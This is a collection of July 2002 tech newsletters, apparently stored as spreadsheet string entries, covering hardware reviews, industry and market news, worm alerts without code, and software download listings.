not mobile CPUs, into laptops. Actually, the trend has been around
for a while, but the bigger vendors used to pooh-pooh these
efforts. (Intel was never too crazy about the idea, either.) Now,
it's a bona fide movement, and the latest 9.6-pound desktop-
replacement system from Toshiba takes this trend to new heights.
But questions abound: Are the extra pounds worth it? Do these 
things really get so hot that you can press pants with them? 
Executive Editor John Morris sorts it out for you. 
click  here for details 
Intel's new insidesThe i845 chipset's many flavors are faster, better, and a lot more confusing. Read before you shop.
	â€¢ Gateway 300 series keeps PCs simple	â€¢ Modernize your motherboardMost popular
Desktops
	1. Gateway 700XL
	2. Dell Dimension 4000 series
	3. HP Pavilion 950
	4. Alienware Aurora DDR
	5. Falcon Northwest Mach V
 See all most popular desktops
Are bigger notebooks better?The latest desktop-replacement notebook from Toshiba takes the
desktop-chip trend to new heights. But Toshiba's not alone. Keep
up with the latest in Executive Editor John Morris's Digital
Domain column. 
Read the columnDesktop chip turbocharges WinBook J4WinBook's big and heavy J4 uses a desktop Pentium 4 and leaves
mobile P4-M notebooks in the dust. (It's a trend; see item No. 1.)
Click here for the full review of this speedy new WinBook.
Read the reviewÂ |Â 
Configure &amp; priceApple eMac not just for education anymoreIdeally suited to students living in small spaces and home users
with basic needs, the eMac is an attractive, adequately speedy,
and easy-to-use PC without the flat-panel iMac's relatively high
price. Wondering whether to go CRT or flat-panel? Read our review.
Read the reviewÂ |Â 
Configure &amp; priceAcer TravelMate 632XCi: P4 to the peopleAcer's new TravelMate delivers just what you'd expect from a
mainstream notebook. It's not the fastest mobile Pentium 4-M
notebook we've tested, but it offers a solid set of features and
long battery life in an attractive, relatively low-cost package.
Find out more here.
Read the reviewÂ |Â 
Check latest pricesFaster RAM boosts Atlas Micro GS 9800Thank Sis Technology (not foot-dragging Intel) for the 645DX
chipset that lets the GS 9800 pair 333MHz DDR SDRAM with a Pentium 4
processor--a combination that ekes out a bit more performance for
the price. For more on this affordable system for gamers and
enthusiasts, read our review.
Read the reviewÂ |Â 
Configure &amp; priceSamsung's bright, cheap, 19-inch CRTThe SyncMaster 950b has its bright points. This 19-inch CRT offers
decent image quality, it doesn't cost a bundle, and a special
highlight zone lets you select an area of your screen and ratchet
up the brightness, making it good for images or video. For more on
this bright idea, read our review.
Read the reviewÂ |Â 
Check latest pricesCNET Message Boards: Computer Help is here
Stumped by computer hardware and software problems? Never fear;
check out the CNET Message Boards, where quick help is just a post
away. Join us in the Computer Help forums.Live tech help: submit your questions now
CNET News.com: Top CIOs on the future of IT
Find a job you love, with more than 1 million postings
ZDNet: This IT director has had enough of Microsoft
May Editors' Choice award: Pioneer's HTS-910DV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</si>
  <si>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Tech Update TodayVITAL SIGNS FOR JULY 17, 2002David Berlind
Where TabletPC will succeed--and why
OK, OK, you readers were right all along. I now believe that Microsoft"s TabletPC can be a big hit. Where? Vertical markets. Why? Development tools.
Why you won't be buying one from DellLatest from ZDNet News
CERT: Security reports multiplying
Microsoft squashes Windows 2000 bugsSun's ID software gets a Liberty face-liftMobile slump puts the bite on Bluetooth
'Rainbow' coalition to spread wirelessHandspring courts corporate buyers
Apple patches serious security holeMore Enterprise News
Farber's PicksDanFarberSlowing sales shrinking Intel workforceIntel announced lower-than-expected earnings yesterday and that 4,000 jobs (5 percent of its staff) would be eliminated this year. This may bring Intel's margins back in line, but the overall outlook is not bright in the coming months, despite Federal Reserve Chairman Alan Greenspan's optimism about a more timely recovery.Read the full story
VMware ups consolidation anteThe new version of VMware's lower-end server product is slated to run atop the latest versions of Linux  from SuSE, 
MandrakeSoft and Red Hat, as well as Microsoft Windows .Net Server due this year. Offering more Intel-server based 
consolidation opportunities than ever, GSX Server 2.0 includes support for AMD's Athlon XP and Intel's Xeon 
processors.
Read the full story
Server consolidation eases system management
Software contracts: Clause for alarmIn the high-stakes game of corporate software negotiations, the silver-tongued sales rep isn't your biggest challenge: It's 
the language in the contracts. Enterprise customers spend surprisingly little time pouring over the fine print of 
multi-million dollar software contracts that are rife with obscure terminology, vague expansion charges, and mind-boggling 
license conversions. As a result, they end up paying in ways they had never imagined long after the deal is signed. Just 
ask California.
Read the fine print
Six steps to the best TCO with Linux
Don't just bring in Linux as yet another OS to manage. To help you determine whether Linux offers better TCO than Windows, 
Gartner examines the benefits and pitfalls of deploying Linux-based servers.
Read the full storyRack server a la modeWith its Xserve rack-mount server, Apple is moving into enterprise territory. The specs are impressive: Dual 1GHz 
PowerPC G4s, up to 2GB DDR SDRAM, two 64-bit 66MHz PCI slots (plus a third combination PCI/AGP slot), dual Gigabit Ethernet, 
FireWire and USB ports, and four Ultra ATA/100 Apple Drive Module bays. But Bill O'Brien thinks Apple's 
licensing may be even more appealing than the hardware.Read the full storyA notebook with desktop muscle
WinBook's big and heavy J4 uses a desktop Pentium 4 and leaves mobile P4-M notebooks in the dust. That means heavy 
lifting for your spreadsheets--and your shoulders. If you travel only occasionally and need top performance, this 
might be the sole computer for you. Read the full review
Write me at dan.farber@cnet.com
Back to topAlso on Tech Update Today
FEATUREÂ Top 10 Web services security requirementsSecurity is a critical, yet often overlooked, aspect of Web services development. Consider these requirements when 
working with your next project. 
 DOWNLOADSÂ Stamp out the bugs
Does your code need a once-over? Debug your software with this collection of tools and utilities designed to locate 
and correct programming mistakes, track defects, and more.
PREVIOUSLY ON TECH UPDATE TODAYÂ Bridging the gap between Liberty and Microsoft
It appears that we are closer to a solution for single sign-on. But what if Microsoft chooses not to support Liberty's specifications?
Microsoft stresses security for Exchange
The software giant plans to improve the Exchange Server e-mail system in the software's first major upgrade in nearly 
two years.Crucial Clicks--products worth looking at
MONITORSA Porsche you can afford
Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.Read reviewMost Popular ProductsMonitors
1. Samsung SyncMaster 151S
2. NEC MultiSync 1550V
3. Envision EN-5100e
4. Samsung SyncMaster 570 V
5. Samsung SyncMaster 955 DF
More popular monitors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</si>
  <si>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20020717 Lockergnome Tech SpecialistÂ  07.17.2002 GnomeREPORT 
Why rely on BIND when you can get UltraDNS: UltraDNS increases Web site
performance, reliability, and security all for as low as $1.00 a month.
Click here to find out more.
Brooklyn Bridge for sale! No kidding! The town of Brooklyn, 
Iowa has a bridge that they are selling on Ebay, so if you have a need for such 
a structure, or just want to have the right to say you 
legitimately purchased the Brooklyn Bridge, here's your 
opportunity! Seriously, this is not a prank!Ever since I was down toward Des Moines last week and had 
a cup-o-java with Jake at Starbucks, I've been craving 
coffee. I can't see myself turning into a coffee junkie like 
Chris, but it's just weird that this would happen, being 
that my extent of coffee drinking has usually been limited 
to the severe need for a quick morning wake-up or in an 
effort to keep warm on cold mornings when out in the field 
back in my Marine Corps days. As time has gone on, I've been trying to cut back on the 
typical geek vices of sugar and caffeine, but I can't drink 
coffee straight. It has to be sweet, and what's the point of 
drinking coffee if there's no caffeine? Enter Splenda. An 
artificial sweetener that has finally made it to Waterloo, 
Iowa. Most of what Diana and I use sugar for has been 
modified to use Splenda instead, with good results. 
Hopefully this coffee thing is just a temporary kick like it 
usually is. I have to brush my teeth after a cup or two from 
the nasty breath. It's fun to test out the dragon-breath on 
the cat to see just how bad it really is. If Bootes sniffs a 
couple of times, it's not too bad, but if she instantly 
recoils, time to employ the Sonicare for a couple of 
minutes. See what you've started, Jake?See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Randy NielandÂ Â Â Â Â Â Â Â GnomeNETWORK
Exchange Titanium Details Emerge
http://www.microsoft.com/presspass/features/2002/jul02/07-15exchangeqa.asp
Oracle recently announced their intention to compete 
directly with Microsoft Exchange, even accepting Outlook as 
an email client. In what seems like a direct response, we're 
handed details of the 2003 release of Exchange Titanium. 
I've always liked what Exchange can do, so I'm certainly 
looking forward to seeing what the new features will be all 
about, but I'm also interested in what Oracle will be 
bringing to the table. Better email functionality, control 
and security are the name of the game, whoever ends up being 
the vendor of choice. Included in this Q&amp;A is a screenshot 
of what Outlook may look like once Office 11 is released. 
It's an interesting concept shot, showing some new ways they 
plan to handle email views. It doesn't say anything for 
Exchange functionality, but it's worth noting regardless.
Â GnomeSYSTEM
Better Pocket PC Audio
Unearthed by David Spencerhttp://home.adelphia.net/~mdukette/downloads.html
An open source project is bringing a different spin to 
audio and video on Pocket PCs, and my first impression is... 
cool! I like what they're working on here. I decided to wipe 
out my Jornada yesterday, so I haven't done a direct 
comparison between the iPaq 3870 and Jornada 565 for audio 
quality using this player, which has an equalizer built-in, 
but it definitely has potential judging from how it sounds 
on the iPaq right out of the gate. Definitely give this a 
peek if you're one of those that likes to play audio and 
video on a Pocket PC. Quite a few different versions are 
supported, so you should be able to find something 
appropriate to your device.
Â GnomeALERTZ
Today's Top 5 kbAlertzQ320278 - WD: "The Custom Dictionary  Is Not Available " Error When You Use Portuguese (Brazilian) Proofing Tools (Q320278)
Q313147 - GetNtmsObjectAttribute Does Not Return Correct Size When the Buffer Is Too Small (Q313147)
Q313317 - A GPO "Register PTR Records" Setting of "Disabled" Is Ignored (Q313317)
Q310869 - STOP Error When You Start Windows After You Connect a Scanner (Q310869)
Q310772 - PCMCIA Device May Not Work in Windows XP (Q310772)
Recommend It!
Â GnomeASSISTANT
50 OS X TIPS: Whether you're making the "switch" from Windows, upgrading 
from a previous version of Mac OS, or just want some helpful tricks to make 
using OS X easier, this ebook is for you. Jake cover's everything from user 
management, to some Terminal basics, to how to navigate differences between 
OS 9 and OS X. 
Get your copy today!    Where's Java?
http://news.com.com/2100-1001-944053.html
Three readers asked me about this very thing this week, 
and it's something you should probably know about if you use 
Windows XP. Microsoft didn't bundle the Java Virtual Machine 
with Windows XP, and since the release of XP, the JVM has been avaialble via the 
Windows Update site as a "convenience" to users. Part of Sun's legal
complaints surrounding how Microsoft has handled Java was that Microsoft did not have the right to 
distribute their implementation via the web, though 
they did have licensing rights to include it with Windows. 
So essentially, Microsoft has things backwards, as it seems. 
Well, to avoid further web distribution arguments, Microsoft 
has yanked the JVM from the Windows Update site and all 
other areas of Microsoft's web site. Microsoft is still 
planning to include Java with Windows XP Service Pack 1. 
You'll have to plan for Java support accordingly, as SP1 is 
still a ways off and you can't get it from Microsoft at this 
point. If you need it for a new installation of Windows XP 
in the short term, Sun will gladly provide you with their 
own distibution. 
Â GnomeSTUFF
Another Xeon Deal
Served up by Warren Dugashttp://www.tigerdirect.com/applications/SearchTools/item-details.asp?sku=C170-1032%20P
I mentioned a really nice deal on Compaq Evo W6000 dual-
Xeon workstations a few weeks back, which I know several of 
you took advantage of, but the $1999 price tag likely scared 
off many others. If you still want to get into a Xeon, check 
this one out. TigerDirect is offering an Evo W8000 
workstation with a single 1.7GHz processor, 18.2GB 15,000rpm U160 
drive, 48x CD-ROM and licenses for both Windows 2000 Pro and 
NT 4.0 Workstation for $699.99. Note that there is NO memory 
and no video card included, so you'll have to scrounge those for 
yourself, but it really is a pretty good deal, on the whole. 
Also realize that these systems take RAMBUS memory, which 
will add a bit of cost, so be sure you know what you're 
getting - a wicked-fast workstation, to be sure! Expandability is also quite amazing with these machines. Recommend It!http://www.lockergnome.com/issues/techspecialist/20020717.html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</si>
  <si>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Jobs touts OS X, iPods, iMacÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 17, 2002Jobs touts OS X, iPods, iMacScient files for Chapter 11 Yahoo Mail puts words in your mouthUnisys splits Intel server line Microsoft sweetens Mac Office offer New chip may portend ATI comebackÂ PerspectivesWhy free downloads help, not hurt
Recording artist Janis Ian argues that file swapping could actually help the industry, and its musicians.
Read Full Story
Jobs touts OS X, iPods, iMacNEW YORK--Apple Computer CEO Steve Jobs on Wednesday defended the company's switch to the Mac OS X operating system and unveiled new iPod digital-audio players and a new flat-panel iMac.
Jobs used his keynote speech at the Macworld trade show here to make a flurry of other announcements as well, such as details about new syncing software, the next update to OS X and the end of free iTools.The most dramatic announcement focused on iPod. The new players include ones built specifically for computers that use Microsoft's Windows operating system.July 17, 2002, 8:30 AM PT
 | Read Full Story Scient files for Chapter 11 Internet consulting firm Scient has filed for Chapter 11 bankruptcy and agreed to sell certain assets to a professional services firm.
The deal calls for Salt Lake City-based SBI to hire some of Scient's employees and to provide up to $4.9 million in financing, pending completion of the asset acquisition.Scient has been struggling for some time now. Once a dot-com darling, the company recently approved a 1-for-20 reverse stock split.
The company and SBI said they expect the bankruptcy court to approve the deal, adding that financing "will allow Scient to continue to deliver services to its clients without interruption until court approval of SBI's acquisition is received."
July 17, 2002, 8:30 AM PT
 | Read Full Story Yahoo Mail puts words in your mouthWhat does Yahoo Mail have against mocha?
That's what users of the company's free e-mail service may be wondering if they try to send a message using the word "mocha" and discover that while in transit, "mocha" mysteriously changes to "espresso."To protect users from malicious code, Yahoo uses an automated filter to swap out a handful of words such as "mocha" that pertain to Web code known as JavaScript.
The reason is that e-mail sent in a form known as "Web enhanced" can contain JavaScript instructions that can run programs on the recipient's PC. JavaScript is a Web language that can issue commands such as telling the browser to open up other windows or to prompt a service to change a password, for example.
July 17, 2002, 4:00 AM PT | Read Full Story 
Unisys splits Intel server line Unisys, a specialist in high-end servers, is coming out with a new lower-cost line of Intel-based servers as it gears up to promote the Itanium 2 chip.
Unisys' new Aries servers accommodate as many as 16 Itanium 2 or Xeon processors and cost between $75,000 and $300,000, said Mark Fevertson, Unisys' vice president of server marketing. It joins the Orion line, which can use up to 32 Xeon or Itanium 2 processors and has been on sale for about two years at a cost between $140,000 and $700,000.
July 17, 2002, 10:40 AM PT
 | Read Full Story Microsoft sweetens Mac Office offer With sales of its Office suite for Mac OS X falling short of projections, Microsoft plans on Wednesday to announce a rebate for those who buy the software bundle when they pick up a new Mac.
The promotion, which runs through Sept. 30, entails a $50 mail-in rebate for people buying a new Mac and upgrading to Office v. X, and $100 for those buying a Mac and the full version of the software. Microsoft is also offering two new pieces of downloadable software: one that lets Palm handhelds synchronize directly with Office v. X and another that lets the Macintosh view programs running on a Windows PC or server.July 17, 2002, 3:00 AM PT
 | Read Full Story New chip may portend ATI comebackATI, once the leader in graphics chips, will launch its comeback bid this week with a new chip that experts say could put the company back in front in terms of performance.
The Markham, Ontario-based company on Thursday will unveil the details of the Radeon 9700, a desktop graphics chip based on a new architecture that will provide greater realism when it comes to 3D images, according to sources.The fastest versions of the new chips will offer considerably higher performance than Nvidia's current GeForce4 roster, giving ATI the edge with gamers as well as PC makers, analysts said. And even after Nvidia--which began to chip away at ATI's leading spot in graphics in 1999--comes out with its GeForce 5 in a few months, the competition between the two will remain close.
July 17, 2002, 4:00 AM PT
 | Read Full Story 
From our partners:Truth is in the iMac of the beholderBusiness Week
It's silly of Apple to try to squelch Internet rumors about its next moves. Jobs &amp; Co. should rejoice that fans care enough to gossip.
July 17, 2002
 | Read Full Story eBags carries it offBusiness Week
The dot-com boom's big spenders couldn't buy success, but this online luggage vendor survived by making frugality its watchword.July 17,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Jobs presents iMac's new face
In his Macworld 2002 keynote, Apple CEO Steve Jobs shows off a new 17-inch flat-panel iMac.
 Watch Video
Â Â EnterpriseCA replaces four board members HP ousts workers for e-mail abuseGroup offers computer security standardE-BusinessVC-backed companies fusing forces Markets edge up on Intel newsuBid to charge listing fees to sellersCommunicationsTellabs warns of "murky" sales future Banks seek freeze on WorldCom funds Motorola's net loss worst everMediaNet watchdog blasts China Web rules Yahoo strikes listing deal with CityFeet Eleven vie for .org namePersonal TechnologyApple to charge for iTools services Apple meets lowered expectations Moxi moves into cable boxes         Â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</si>
  <si>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CNET Investor Dispatch
Quote LookupEnter symbol:Â· Symbol Lookup
Quotes delayed 20+ minutes
â€¢ My Portfolio
â€¢ Broker Reports
â€¢ IPOs
â€¢ Splits
â€¢ Messages
Â 
TLTOA
23.0
35.29%
Â 
INFS
12.7
23.42%
Â 
JACO
4.9
22.19%
Â 
TSCM
2.92
22.18%
Â 
XOSY
5.5
20.88%
Â 
AUGT
5.239
-36.88%
Â 
BUCA
9.26
-30.64%
Â 
SPIR
1.9
-29.60%
Â 
RSTO
4.95
-23.26%
Â 
NOVN
11.935
-22.10%
July 17, 2002 DJIA8542.48 Â 69.37
 NASDAQ1397.25 Â 21.99
 S&amp;P 500906.04 Â 5.10
 CNETÂ TECH1,007.43 Â 14.52Techs gain on Intel, Motorola news
Although computer chip titan Intel posted lower-than-expected earnings, its upbeat forecast helped lift technology shares Wednesday.Also boosting the sector was Motorola, which beat expectations for operating earnings and predicted a net profit in the last two quarters of the year. CNET's Tech index rose 14.46 points, or 1.41 percent, to 1,007.37, and the tech-laced Nasdaq composite index tacked on 21.97 points, or 1.6 percent, to 1,397.23.With aircraft maker Boeing beating the consensus Wall Street earnings estimate, the Dow Jones industrials increased 69.37 points, or 0.82 percent, to 8,542.48. The S&amp;P 500 rose 5.08 points, or 0.56 percent, to 906.02.
Motorola Sees Profit Rebound 
CHICAGO - Wireless technology giant Motorola Inc. on Wednesday said it expects to bounce back to a net profit in the third and fourth quarters helped by aggressive cost cutting.Motorola, a day after posting the largest quarterly loss in its history, said it expects to achieve earnings of about 2 cents a share in the third quarter and 10 cents in the fourth quarter. The estimated earnings for the second half of the year includes charges of about $215 million related to previously announced restructuring actions.The world's second largest mobile phone maker has slashed its work force by more than a third from its peak of 150,000 in August 2000. It said last month it would cut another 7,000 jobs, bringing employment to 93,000 by mid-2003.MOTOROLA, INC 15.15 4.27% Apple meets lowered expectations 
Apple Computer on Tuesday reported quarterly sales and earnings that matched analysts' lowered expectations as flat-panel iMac sales and sales to schools fell short of the company's initial hopes.
The company earned $32 million, or 9 cents per share, on revenue of $1.43 billion. In the same quarter a year ago, Apple earned $61 million, or 17 cents per share, on revenue of $1.48 billionAnalysts expected Apple to report earnings of 9 cents per share, according to First Call. Apple warned last month that sales would be in the range of $1.4 billion to $1.45 billion, down from an earlier estimate of $1.6 billion. The company said it expected earnings to be between 8 and 10 cents per share.APPLE COMPUTER INC 15.63 -12.49% HP, EMC storage systems to work better together 
SAN FRANCISCO - Hewlett-Packard Co. and EMC Corp. said on Wednesday that they were opening up technology to each other in order to maker their storage systems work better together.However, the deal will not include technology from Hitachi Data Systems, which makes the hardware for HP's high-end storage system, an HP spokesman said.The deal follows close cooperation between storage heavyweight EMC and Compaq Computer Corp., which was acquired by HP in May.HEWLETT-PACKARD CO 13.57 -4.84% 
Also from CNET
Real-time stock quotes from CNET News.com Investor.30-day free trial!
Investec Inc. stays bullish on Intel in report 7/17/02 
Analysts Eric Ross and Sam Chang reiterate a "strong buy" rating on the computer chip giant after it reports second-quarter earnings below the consensus Wall Street estimate. Ross and Chang expect a modest seasonal increase in demand in the second half of this year, with strength in consumer laptop buying. Calling Intel the premier semiconductor firm, they suggest the stock is a bargain.INTEL CORP 19.44 5.88% 
Visit the Brokerage Center
AT&amp;T names Dorman chairman, succeeding Armstrong 
NEW YORK - AT&amp;T Corp. said on Wednesday its president, David Dorman, will succeed C. Michael Armstrong as chairman and chief executive officer when the nation's largest telephone company sells its cable-television business to Comcast Corp.Dorman's appointment, which was widely expected, will become effective once the sale of AT&amp;T Broadband closes later this year.AT&amp;T CORP 10.45 2.55%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</si>
  <si>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CNET Virus &amp; Security Newsletter		Â Â 
July 17, 2002
						--Robert VamosiSenior Associate EditorCNET Software and Internet Services
Â Dear Readers,
So far, 2002 has been a year marked with variations on earlier
worms. If you update your antivirus software on a regular basis,
these new versions of Frethem and Yaha shouldn't be a nuisance.
But if you haven't updated in a while, these variants--plus the
continuing threat of Klez.h--should motivate you. In security
news, a flaw in certain versions of PGP encryption could affect
Outlook users. Read on to learn whether you're vulnerable.
						Â 
Frethem.k worm wants to give you a password
 An e-mail message that promises to reveal secret information with
a password is yet another variant from the pesky Frethem worm
family. Frethem.k, technically known as w32.frethem.k@mm, also
called Frethem.l by some vendors, uses its own SMTP engine to
send e-mail using addresses obtained from infected systems. This
worm does not carry a destructive payload. Mac and Linux users
are not affected.Yaha.e screensaver worm spreading
 The Yaha.e mass-mailing worm masquerades as a friendly
screensaver, proving that users worldwide are still opening
attached files from total strangers. Yaha.e (w32.yaha.e@mm, also
known as Lentin.e, Yaha.f, and Yaha.g) is a successful variant of
a worm first seen around Valentine's Day this year. Thankfully,
this worm does not affect Mac, Linux, or Unix users.
Leaky PGP Outlook plug-in 
PGP 7.03 and 7.04, widely used plug-ins for Microsoft's Outlook
e-mail client, inadvertently weakens security and leaves the mail
program open to attack. Fortunately, there is a patch available.
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camerasÂ 
SearchÂ Â In SoftwareAll CNETÂ Â Â Â The Web
Â Â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</si>
  <si>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CNET Cool GearElectronics
 		All CNET
 		The Web
		Â 
Toshiba Pocket PC e310
In HandheldsOnkyo TX-DS797
In ElectronicsCanon PowerShot G2
In CamerasPioneer HTS-910DV
In ElectronicsCreative Labs Nomad Jukebox 3
In Portable ElectronicsMicrosoft Xbox
In ElectronicsPanasonic DVD-RP91 DVD player
In Electronics
July 17, 2002                     --Colin Duwe
                     Associate Editor
                     CNET Electronics
Dear readers,Everybody seems to have a cordless phone at home. But how do
you know which models offer the best value? Well now you can
turn to CNET. Last week, we launched our reviews of cordless
phones. So when the time comes to replace your phone, pay a
visit to CNET for some unbiased advice on what to buy.
Read the full story  Cordless phones: The other wireless devices
Are you in the market for a new cordless phone but don't know whether
  to buy a 900MHz or a 2.4GHz model or what manufacturer offers
  the best product? No sweat--check out our new line coverage
  to find the phone that fits your personal style and needs.
    Read the full story
Sony DCR-VX2000: MiniDV maestroÂ 
Sony"s DCR-VX2000 gives prosumers a versatile tool for
  capturing high-quality digital video. With three CCDs, smooth
  performance, and excellent low-light capability, this
  camcorder meets the demands of avid videographers where
  lesser cameras fail.
    Read the reviewÂ |Â 
    Check prices
Image is everything: JVC"s HDTV VCR
The world"s first D-Theater video deck has hit the market. It
  isn"t cheap, but it sure delivers an awesome picture, with
  more than twice the resolution of DVD. Read the full review.
    Read the review  Â |Â 
	Check prices
Harman Kardon AVR 125: All you need? 
This may be the least expensive of HK's home-theater
  receivers, but we gave it high marks for sound quality, handy
  features, and ease of use. Is it all the receiver that you
  need?
    Read the review Â |Â 
	Check prices 
Sony CLIE PEG-T665C: Perhaps the last Palm OS 4 PDA
With a fast processor, a great color screen, and MP3 support,
  this handheld looks appealing. But with comparably priced
  Pocket PCs available and a new wave of Palm-powered devices waiting in
  the wings, the T665C is a tough call. We give you our advice.
    Read the full column Â |Â 
	Check prices 
Hitachi DVP725U: Classy progressive-scan player
With sleek looks, excellent picture quality, and a sub-$200
  price tag, the DVP725U fares well against the rest of the
  budget-progressive-scan DVD player competition. Find out why
  our reviewer thinks it"s a good bargain.
    Read the full column Â |Â 
	Check prices 
 Live tech help. Submit your question now. CNET News.com: Top CIOs on the future of IT. Find a job you love. More than 1 million postings ZDNet: This IT director has had enough of Microsoft May Editors' Choice award: Pioneer's Home Theater System HTS-910DVThe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</si>
  <si>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Download Dispatch: Tools for Software Developers
Â Stamp out the bugs
Does your code need a once-over? Debug your software with this collection of tools and utilities designed to locate and correct programming mistakes, track defects, and more.XML Spy Suite 4.4
Open and edit XML, XSL, 3DML, or DTD documents.
JadeIDE for Java 3.0Use this GUI to edit your source code more easily.
UniquE RAR File Library 0.4.0
Enable your applications to create and decompress RAR archives.
SkICMP ActiveX Control 2.2
Diagnose, troubleshoot, and monitor your network.
Software Upgrades:Â 1.
				 ZoneAlarm Pro 3.0Â 2.
				 Norton AntiVirus 2002Â 3.
				 AdSubtract Pro 2.5Â 4.
				 Microsoft Windows XP - ProfessionalÂ 5.
				 Nero Burning ROM 5.5Â 6.
				 Reason 2.0Â 7.
				 Microsoft Windows XP - Home EditionÂ 8.
				 QuickBooks Pro 2002 Â 9.
				 Adobe Photoshop 7.010.
WinZip 8.1Find a complete
list of the 50 most popular software products at CNET
Shopper.com.
July 17, 2002 Greetings from Download.com!
No software developer is immune to bugs. Even the cleanest code
will have to go through a debugging process, but some debuggers
are more efficient than others. Check out Download.com's
complete collection of debugging tools here, and put away the
can of Raid.Also this week, we've got some very handy utilities. First,
there's Chilkat, a cool zip/unzip ActiveX control that you can
add to any language with ActiveX support (which is most major
ones). But my personal favorite is VB-PowerWrap, a simple tool
that takes all the far-flung bits and pieces of your Visual Basic
masterpiece and socks them all away into one executable file
for ease of distribution.Becky Waring
Contributing Editor, CNET Download.com
From Builder.comAchieving
persistence with Entity Beans
Enterprise JavaBeans (EJB) allow for greater code reuse and
   flexibility. See how Entity Beans enable you to leverage EJB
   functionality in your apps.Counting
lines of code can help measure progress
One developer has come around to thinking that counting lines
   of code can yield useful information. He explains why and
   shares a sample app that automates the process.in ActiveX
Chilkat Zip 6.0.2
Need to add zip capability to your apps? Create and
   decompress zip archives with the Chilkat Zip ActiveX
   control. The control provides easy access to individual files
   stored within a zip archive. You can search for a file within
   the zip using a wildcard string and then extract individual
   files or files matching a pattern. Files can be unzipped to
   any directory, and the control's memory management allows any
   size file to be compressed or decompressed in a constant
   memory footprint. The control allows you to compress directly
   from memory buffers or strings, as well as add multiple files
   with wildcarding. There's even a real-time progress monitor
   for zip and unzip operations. Chilkat supports Active Server
   Pages, Visual Basic, Visual C++, Delphi, C++ Builder, and all
   languages that use ActiveX controls.in Java
Anfy Java 2.0
Anfy is a collection of 52 applets for Web pages, desktop
   wallpapers, or screensavers. Within the program's simple
   interface, you can quickly apply real-time graphic effects to
   GIF and JPEG images. Effects include 3D texture-mapped cube
   menus, lake effects, water and fire, deformations, zoom
   rotators, lens magnification, waving flags, animations,
   scrolling text, customizable IFS fractals, color changers,
   light shading, tunnels, and wormholes.in Tools &amp; Editors
VB-PowerWrap 3.1
Distribute Visual Basic applications the easy way with
   VB-PowerWrap. VB-PowerWrap embeds all dependent and
   non-dependent files into the executable of your VB program,
   including DLLs and OCXs, graphics, databases, and text files,
   to create a single clickable application. VB-PowerWrap scans
   a VB project, wraps the appropriate files, and creates a
   self-contained file for distribution. In addition,
   VB-PowerWrap compresses all DLLs and OCXs and registers
   appropriate controls on the user's machine if needed. It
   works with Visual Basic 4, 5, and 6.Â 
Most
Popular TitlesWeek ending July 14Â Â LastÂ Â WeekÂ 
Â Â WeeksÂ Â onÂ ChartÂ 
Â Â DownloadsÂ Â This
WeekÂ 
1.Microsoft
Windows Installer (95/98/Me)
2
84
9,082
2.Microsoft
Data Access Components RTM3848,901
3.Java 2
Runtime Environment, SE
4848,197
4.Visual Basic
6.0 Runtime Module SP55737,960
5.Mozilla (32-bit)
7
5
6,683
6.ActiveX Control Pad
674,030
7.UltraEdit-3211842,9958.Borland C++ Compiler9602,4929.Java 2 Development Kit10842,177
10.TextPad (32-bit)12842,056The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</si>
  <si>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CNET | CatchUp Dispatch
CNET: A note to our subscribers
July 17, 2002
Vol. 3, No. 17Dear CatchUp newsletter subscribers:Starting this week, we will be taking a break from our
regularly scheduled CatchUp newsletter--our apologies for any
inconvenience this may cause. However, have no fear, the
CatchUp database is still being updated, so run CatchUp now and
see what updates are waiting for you. As always, a hearty
thank-you for your continued support.Cheers!The CatchUp Team_________________________________________________________________The e-mail address for your subscription is qqqqqqqqqq-zdnet@spamassassin.taint.orgTo sign up for more CNET newsletters, click here:
http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnetTo unsubscribe, click here:
http://clickthru.online.com/Click?q=89-h2JbrpJiraHZk5rhpCqNpVwaE_Yl9sRRFor the CNET Newsletters FAQ, click here:
http://clickthru.online.com/Click?q=9f-o7XMQ1JdPBetrVIYlcGhVIlcU_eR To learn about advertising opportunities in CNET Newsletters, click
here:
http://clickthru.online.com/Click?q=b4-aJlbQ6Z1ubiOo-gqJzDxDXozLCyR 
Copyright 2002 CNET Networks, Inc. All rights reserved.</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</si>
  <si>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Sun's Java-Liberty moves risk industry scuffles
    It's a trust thing
        http://www.theregister.co.uk/content/4/26234.html    MS white paper says Palladium open, clean, not DRM
    Quite plausibly, too. They're really trying very hard here...
        http://www.theregister.co.uk/content/4/26231.htmlSemiconductors    Itanic OEM slams Itanic
    Never mind our servers, it's b*ll*cks
        http://www.theregister.co.uk/content/3/26248.htmlInternet    Apple joins in 'end of free Internet' bandwagon
    Cough up or else
        http://www.theregister.co.uk/content/6/26244.html    Team demos 'first quantum crypto prototype machine'
    The secret comes out of the lab
        http://www.theregister.co.uk/content/6/26243.html    BT suspends techie over Angus Deayton phone tap claim
    Man arrested
        http://www.theregister.co.uk/content/6/26242.html    Energis shareholders are revolting
    Create Web site to 'fight for small investor'
        http://www.theregister.co.uk/content/6/26240.html    Domain Registry of Europe defends tactics, sues Tucows
    Says it says here, not a bill
        http://www.theregister.co.uk/content/6/26239.html    MS to charge for MSN 8 browser - msn.co.uk for chop?
    Seems to be losing interest in the things MSN UK does
        http://www.theregister.co.uk/content/6/26238.html    Oftel rejects BT break-up call
    Reckons it can handle BT
        http://www.theregister.co.uk/content/6/26233.htmlNet Security    'Hacker' security biz built on FBI snitches
    Gweeds gets L0pht/@Stake's number
        http://www.theregister.co.uk/content/55/26247.html    Team demos 'first quantum crypto prototype machine'
    The secret comes out of the lab
        http://www.theregister.co.uk/content/55/26243.html    NetIQ claims detects Hacktivismo tool
    Spoilsports?
        http://www.theregister.co.uk/content/55/26235.htmlBusiness    HP confirms 150 suspended in email porn probe
    Disciplinary process
        http://www.theregister.co.uk/content/7/26246.html    Apple earnings fall but meet forecasts 
    Whatever
        http://www.theregister.co.uk/content/7/26245.html    Europe extends employment rules to teleworkers
    Three year transition period
        http://www.theregister.co.uk/content/7/26241.html    Energis reborn as 'Chelys,' but still called Energis
    Bankers move in
        http://www.theregister.co.uk/content/7/26237.html    Motorola chalks up biggest ever loss, but returns to profit
    It's the way you tell them...
        http://www.theregister.co.uk/content/7/26236.htmlThe Mac Channel    Mac drought fails to lift Street, spirits
